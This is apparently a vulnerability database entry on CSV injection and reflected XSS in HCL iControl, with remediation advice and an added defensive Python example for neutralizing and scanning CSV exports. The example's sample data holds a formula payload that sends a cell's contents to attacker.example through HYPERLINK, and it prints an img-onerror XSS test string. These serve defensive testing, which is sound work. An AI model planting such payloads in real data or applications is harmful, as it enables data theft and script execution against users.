Severity by source
CVSS vector (NVD): CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
Primary rating from NVD · only source for this CVE.
Description (CVE.org)
HCL iControl was affected by an Export CSV - CSV Injection vulnerability. It is also vulnerable to a reflected cross-site scripting vulnerability. Both were caused by insufficient sanitization of input parameters.
Analysis (AI)
CSV injection and reflected cross-site scripting affect HCL iControl because of insufficient input sanitization in the Export CSV feature and in request parameters that are reflected back into HTML responses. An attacker who can lure an authenticated user into clicking a crafted link can execute script in the victim's browser session; an attacker with a low-privilege account can store formula-shaped values that end up in exported CSV files and are evaluated when an operator opens the export in a spreadsheet application. No public exploit was identified at the time of analysis. The CVSS 3.1 base score is 7.1 (High): the full confidentiality, integrity and availability impact (C:H/I:H/A:H) is tempered by high attack complexity and by the need for low privileges and user interaction.
Technical Context (AI)
HCL iControl is HCL Software's IT operations and infrastructure control product. The CWE assigned is CWE-1236 (Improper Neutralization of Formula Elements in a CSV File), commonly called CSV injection or formula injection: user-controlled values written into CSV cells that begin with =, +, -, or @ (some guidance also treats a leading tab or carriage return as a trigger) are interpreted as formulas by Excel, LibreOffice or Google Sheets when the export is opened. Depending on the application and its prompts, this can lead to command execution (for example via DDE in Excel) or data exfiltration (for example via HYPERLINK, or IMPORTXML in Google Sheets). The vendor advisory also describes a parallel reflected XSS condition in which input parameters echoed into HTML responses are not encoded, so attacker-controlled HTML/JavaScript executes in the victim's browsing context. Both root causes are the same defect seen in two output contexts: missing output-context-aware neutralization (HTML encoding for the web UI, formula prefixing or escaping for CSV cells).
Remediation (AI)
Apply the fixed release referenced in HCL's advisory at https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131041. The exact fix version is not included in the supplied data and should be confirmed directly with HCL Support. Until the patch is deployed: restrict access to the iControl web interface to trusted administrative networks; instruct operators not to open exported CSV files in a spreadsheet application without first reviewing them in a plain-text viewer or scanning them for cells that begin with a formula trigger (trade-off: slows normal reporting workflows); and add a strict Content-Security-Policy at the reverse proxy to limit inline script execution as a partial XSS mitigation (trade-off: may break legitimate iControl UI features and requires testing; note that browser-side XSS filters have been removed from current browsers and are not a substitute). Disable or remove the CSV export functionality if it is not operationally required (trade-off: loss of reporting capability).
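The two neutralizations described under Technical Context (formula prefixing for CSV cells, HTML encoding for reflected parameters) and the pre-open CSV review suggested above, as an added example that is not part of this page or of HCL's code. It assumes a Python export routine with hypothetical field names (host, owner, delta) and constructed sample rows; neutralize_csv_cell, export_csv, export_csv_unsafe, render_results_fragment and scan_csv_for_formulas are names chosen for the example.

```python
"""Added example (not HCL iControl code): context-aware neutralization for
a CSV export and an HTML reflection, plus a scanner for reviewing an
already-exported CSV before a spreadsheet opens it.  Field names and the
sample rows are constructed for illustration."""
import csv
import html
import io
import re

# Leading characters that Excel, LibreOffice and Google Sheets may treat as
# the start of a formula.  Tab and carriage return are included because some
# importers trim leading whitespace before checking the first character.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# A signed integer or decimal is data, not a formula; leave it alone so that
# numeric columns still behave as numbers after export.
_PLAIN_NUMBER = re.compile(r"[+-]?\d+(\.\d+)?")


def neutralize_csv_cell(value):
    """Return the cell as text a spreadsheet will not evaluate.

    A leading single quote marks the cell as literal text in Excel and
    LibreOffice.  The quote is visible to the reader; that is the accepted
    trade-off for not silently executing attacker-supplied formulas.
    """
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS) and not _PLAIN_NUMBER.fullmatch(text):
        return "'" + text
    return text


def export_csv(rows, fieldnames):
    """Hardened export: every cell neutralized, every field quoted."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({f: neutralize_csv_cell(row.get(f)) for f in fieldnames})
    return buf.getvalue()


def export_csv_unsafe(rows, fieldnames):
    """The vulnerable shape, for contrast: values written verbatim, so a
    stored "=..." value reaches the spreadsheet as a live formula."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({f: row.get(f) for f in fieldnames})
    return buf.getvalue()


def render_results_fragment(query):
    """Reflect a request parameter into an HTML text node.  html.escape with
    quote=True covers text-node and attribute-value contexts; a URL or
    JavaScript context would need its own encoder instead."""
    return "<p>Results for: {}</p>".format(html.escape(query, quote=True))


def scan_csv_for_formulas(text):
    """Return (row, column, cell) for every cell a spreadsheet could evaluate.
    Run this over an export before opening it in Excel or LibreOffice."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for c, cell in enumerate(row, start=1):
            if cell.startswith(FORMULA_TRIGGERS) and not _PLAIN_NUMBER.fullmatch(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample: a low-privilege user has stored formula-shaped text in
# the hypothetical "owner" field; "delta" holds legitimate signed numbers.
FIELDS = ["host", "owner", "delta"]
SAMPLE_ROWS = [
    {"host": "web01", "owner": '=HYPERLINK("http://attacker.example/?"&A1,"open")', "delta": "-12"},
    {"host": "db01", "owner": "@SUM(1+1)", "delta": "+7"},
    {"host": "app01", "owner": "alice", "delta": "3"},
]

if __name__ == "__main__":
    unsafe = export_csv_unsafe(SAMPLE_ROWS, FIELDS)
    safe = export_csv(SAMPLE_ROWS, FIELDS)
    print("formula cells in verbatim export:", scan_csv_for_formulas(unsafe))
    print("formula cells in hardened export:", scan_csv_for_formulas(safe))
    print(render_results_fragment('"><img src=x onerror=alert(1)>'))
```

Running the module shows the scanner flagging the two formula-shaped cells in the verbatim export and nothing in the hardened one. Signed numbers are deliberately left untouched so numeric columns stay usable; free text that merely starts with a minus sign (such as "-1+1") does not match the number pattern and is still prefixed.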
HCL iControl's web interface fails to automatically expire user sessions after inactivity, leaving authenticated session
Weak input validation in HCL iControl allows authenticated remote attackers to submit input of an unexpected type, resul
Missing HTTP security response headers in HCL iControl fail to instruct client browsers to engage their built-in XSS fil
Stack trace disclosure in HCL iControl v4.0.0 exposes internal application details to authenticated remote attackers via
HCL iControl exposes session cookies without the Secure or SameSite attributes set, and with the cookie path scoped to r
EUVD-2025-210058
GHSA-x53x-g43q-33f7